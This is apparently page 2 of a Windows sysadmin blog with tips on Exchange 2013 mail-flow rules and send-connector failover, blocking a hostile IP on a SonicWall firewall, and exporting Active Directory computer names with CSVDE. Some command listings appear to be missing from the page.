That should do it. Sometimes the binding to the SSL CERTIFICATE gets screwed up. There are other threads out there talking about "netsh http show sslcert" and to "netsh http add sslcert ipport" but this doesn't change it to the correct SSL CERT. Changing it to another SSL CERT is simply guessing which is an overall bad idea. We need to understand the problem.

## Block Messages to Exchange Group Except From Certain Domains

Let's say you have a group called "Everyone". But you only want internal people to be able to email the group and possibly another company.

There are some other parameters in there too but that should do it.

If you want to do it visually:

• -open the EAC.
• -click MAIL-FLOW (on the left-hand side).
• -click NEW.
• -type: A-NAME-FOR-THE-RULE
• -click THE MESSAGE > THE TO BOX CONTAINS.
• -search for GROUP-NAME.
• -BLOCK THE MESSAGE > REJECT THE MESSAGE AND INCLUDE EXPLANATION.
• -type UNKNOWN USER or some other explanation.
• -click MORE OPTIONS.
• -click THE SENDER > DOMAIN IS
• -type: domain1.com
• -click +
• -and so on.
• -click OK > SAVE (at the bottom).

## Block IP Address on Sonicwall

Let's say you have an IP ADDRESS on the WAN trying to perform a DDOS or a SYN-FLOOD attack to your location. Even though you have the DDOS attack proxied via FIREWALL-SETTINGS > FLOOD-PROTECTION as "Proxy WAN client connection when attack is suspected", you still want to send a message that these types of activities will not be tolerated.

Or you find out that the WAN IP ADDRESS is most definitely malicious as in the following IP from OFFSHORE RACKS: 181.174.167.251

This IP ADDRESS happens to be a Russian forum for DARKMONEY.CC. I can't even read the web site. It's irrelevant at this point. I know it malicious.

### To block the WAN IP ADDRESS:

• -set the "Zone" as WAN.
• -Navigate to the Firewall > Access Rules page.
• -Select the WAN to LAN button to enter the Access Rules (WAN > LAN) page.
• -Select DENY as the Action.
• -Select ANY as the Service
• -Select Source as the address object or group created earlier.
• -Select ANY as the Destination

The above is adapted from here:
https://support.software.dell.com/kb/sw9982

The REAL-TIME-DEMO can be accessed here:
https://realtime.demo.sonicwall.com/main.html

## Collect Computer Names from Windows Server 2013

Here's an interesting one to collect all computer names in the active directory. Run from CMD:

CSVDE -f adexport.csv -r objectClass=computer -l “DN,cn,objectClass,lastLogon,lastLogonTimestamp,pwdLastSet,userAccountControl,operatingSystem,operatingSystemVersion,whenCreated,description”

## Exchange 2013 Send Connector Load Balancing and Failover

In my recent article USING MANDRILL WITH EXCHANGE 2013, I show how to add Mandrill to Exchange as a SEND CONNECTOR. Further questions become:

1: How do I use it as a load balancer. In other words, how do I set it up so that some of the email goes through the second SEND CONNECTOR?

2: How do I use it as a failover? In other words, how do I set it up so that if the first SEND CONNECTOR doesn't route email, it re-routes through the second SEND CONNECTOR?

The problem is this, multiple equal cost send-connectors will not balance. Or as I read, "When the cost of the Send Connectors and the proximity to their source servers are the same, Exchange will simply choose the one with the alphanumerically lower connector name, and will not load balance the outgoing email across both connections."

The actual way to load balance is when multiple smart hosts are configured on a single Send Connector the outgoing email will be correctly load balanced.

The problem becomes, if you try this in reality, you must use the same USERNAME & PASSWORD for all SMARTHOSTS, which isn't a possibility. And secondly, you cannot load balance both the local connection and a smarthost.

by creating a fake domain in DNS. Lets say smarthost.local and then creating A records in this zone for each SMTP smarthost (i.e. mail.oxford.smarthost.local). Then create an MX record for your first site (oxford.smarthost.local MX 10 mail.oxford.smarthost.local). Repeat for each site, where oxford is the site name of the first site in this example.

Then you create second MX records, lower priority, in any site but use the A record of a smarthost in a different site (oxford.smarthost.local MX 20 mail.cambridge.smarthost.local).

Then add oxford.smarthost.local as the target smarthost in the send connector. Exchange will look up the address in DNS as MX first, A record second, IP address last), so it will find the MX record and resolve the A records for the highest priority for the domain and then round-robin across these A records.

### Failover

Failover seems to be answered via the same path. The idea is create 1 send connector. The first MX record in the fake SMARTHOST in the SEND-CONNECTOR is back to the local system. The second MX record in teh fake SMARTHOST is to the remote SMARTHOST.

First of all, ensure you have DNS A records for your mail gateways in place. Next, come up with a random name for your soon-to-be-created MX record in DNS. In this example, I chose allsmarthosts.forest1.local. Create the required MX records in DNS.

As with plain MX-based routing, Exchange will use the MX record with the higher priority, as long as it’s available. Now the only thing left to do is to reconfigure the Exchange Send Connector to read allsmarthosts.forest1.local as the only smart host.

By doing so, Exchange will use primary.forest1.local for outbound mail, as long as it’s available. Once it goes down or becomes unreachable, Exchange will start using secondary.forest1.local as the smart host. That’s what a little DNS trickery can do for you.

### Conclusion

The idea of this is to use MANDRILL if for some reason mail is not being sent through the local connection (for example, blacklist). I didn't implement the solutions above simply because I don't think it will work with a SMARTHOST that requires a USER/PASS. I'm not willing to try. That's suicide by client.

In the end, software is set to work in a certain way. When it doesn't, trying to find workarounds is nearly impossible and seemingly pointless. The end result is that EXCHANGE 2013 isn't set to work this way. I wanted this to happen automatically. Since it doesn't, I'll just have to manually switch SEND CONNECTORS if the need arises. Maybe it doesn't matter a whole lot in an ever-increasing cloud world.

Page 2 of 4